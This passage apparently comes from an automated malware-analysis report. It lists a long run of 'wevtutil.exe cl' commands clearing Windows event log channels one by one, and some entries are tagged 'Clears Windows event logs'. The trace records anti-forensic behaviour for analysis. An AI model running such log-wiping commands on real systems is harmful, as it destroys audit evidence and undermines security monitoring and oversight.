wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
3⤵
- Clears Windows event logs
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
3⤵
- Clears Windows event logs
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
3⤵
PID:860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
3⤵
- Clears Windows event logs
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
3⤵
- Clears Windows event logs
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
3⤵
PID:1088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
3⤵
PID:1764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
3⤵
- Clears Windows event logs
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
3⤵
PID:1132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
3⤵
- Clears Windows event logs
PID:632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
3⤵
PID:1732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
3⤵
PID:764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
3⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
3⤵
PID:1648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
3⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
3⤵
PID:1916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
3⤵
- Clears Windows event logs
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
3⤵
PID:1772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
3⤵
PID:1168

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
3⤵
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
3⤵
- Clears Windows event logs
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
3⤵
PID:1748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
3⤵
PID:624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
3⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
3⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
3⤵
PID:860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
3⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
3⤵
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
3⤵
PID:1088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
3⤵
PID:1764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
3⤵
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
3⤵
- Clears Windows event logs
PID:1132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
3⤵
- Clears Windows event logs
PID:632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
3⤵
PID:1732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
3⤵
PID:764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
3⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
3⤵
PID:1648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
3⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
3⤵
PID:1916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
3⤵
PID:1772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
3⤵
PID:1168

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
3⤵
- Clears Windows event logs
PID:836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
3⤵
PID:1112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
3⤵
- Clears Windows event logs
PID:384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
3⤵
PID:1860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
3⤵
PID:876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
3⤵
PID:224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
3⤵
PID:1640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
3⤵
PID:1572

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
3⤵
PID:1508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
3⤵
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
3⤵
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
3⤵
PID:1864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
3⤵
- Clears Windows event logs
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
3⤵
PID:564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
3⤵
PID:980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
3⤵
PID:2032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
3⤵
PID:1296

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
3⤵
PID:1976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
3⤵
PID:1248

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
3⤵
PID:1308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
3⤵
PID:1948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
3⤵
PID:1532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
3⤵
PID:1356

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
3⤵
PID:884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
3⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
3⤵
PID:1200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
3⤵
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
3⤵
- Clears Windows event logs
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
3⤵
PID:1940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
3⤵
- Clears Windows event logs
PID:1428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
3⤵
PID:1748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
3⤵
PID:624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
3⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
3⤵
- Clears Windows event logs
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
3⤵
PID:860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
3⤵
- Clears Windows event logs
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
3⤵
PID:852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
3⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
3⤵
PID:1696

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
3⤵
PID:1864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
3⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Help/Operational"
3⤵
PID:564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
3⤵
- Clears Windows event logs
PID:980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
3⤵
- Clears Windows event logs
PID:2032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
3⤵
PID:1296

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
3⤵
PID:1976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
3⤵
PID:1248

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
3⤵
PID:1308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
3⤵
PID:1948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
3⤵
PID:1532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
3⤵
PID:1356

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
3⤵
PID:884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
3⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
3⤵
PID:1200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
3⤵
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International/Operational"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
3⤵
PID:1940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
3⤵
- Clears Windows event logs
PID:1428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
3⤵
- Clears Windows event logs
PID:1636

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
3⤵
- Clears Windows event logs
PID:796

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
3⤵
- Clears Windows event logs
PID:2044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
3⤵
PID:1996

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
3⤵
- Clears Windows event logs
PID:220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
3⤵
PID:1576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
3⤵
PID:824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
3⤵
PID:1640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
3⤵
PID:288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
3⤵
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
3⤵
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
3⤵
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
3⤵
- Clears Windows event logs
PID:1088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
3⤵
PID:1764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
3⤵
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
3⤵
- Clears Windows event logs
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
3⤵
PID:1132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
3⤵
PID:632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
3⤵
PID:1732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
3⤵
- Clears Windows event logs
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
3⤵
PID:1648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
3⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
3⤵
PID:1916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
3⤵
PID:1772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
3⤵
PID:1168

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
3⤵
PID:836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
3⤵
PID:580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
3⤵
PID:760

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
3⤵
PID:1748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
3⤵
PID:624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
3⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
3⤵
- Clears Windows event logs
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
3⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
3⤵
PID:944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
3⤵
PID:852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
3⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
3⤵
PID:1696

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
3⤵
PID:1864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
3⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
3⤵
PID:564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
3⤵
PID:980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
3⤵
PID:2032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
3⤵
PID:1296

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
3⤵
PID:1976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
3⤵
PID:1248

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
3⤵
PID:1308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
3⤵
PID:1948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
3⤵
PID:1532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
3⤵
PID:1356

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
3⤵
PID:772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
3⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
3⤵
PID:1200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
3⤵
- Clears Windows event logs
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
3⤵
PID:1940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
3⤵
PID:1428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
3⤵
PID:1636

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
3⤵
PID:796

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
3⤵
PID:384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
3⤵
PID:1996

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
3⤵
PID:220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
3⤵
PID:1576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
3⤵
PID:824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
3⤵
PID:1640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
3⤵
PID:288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
3⤵
PID:1508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
3⤵
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
3⤵
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
3⤵
PID:1088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
3⤵
PID:1764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
3⤵
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
3⤵
PID:1536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
3⤵
PID:632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
3⤵
PID:1732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
3⤵
- Clears Windows event logs
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
3⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
3⤵
PID:1648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
3⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
3⤵
PID:1916

C:\Windows\system32\wevtutil.exe
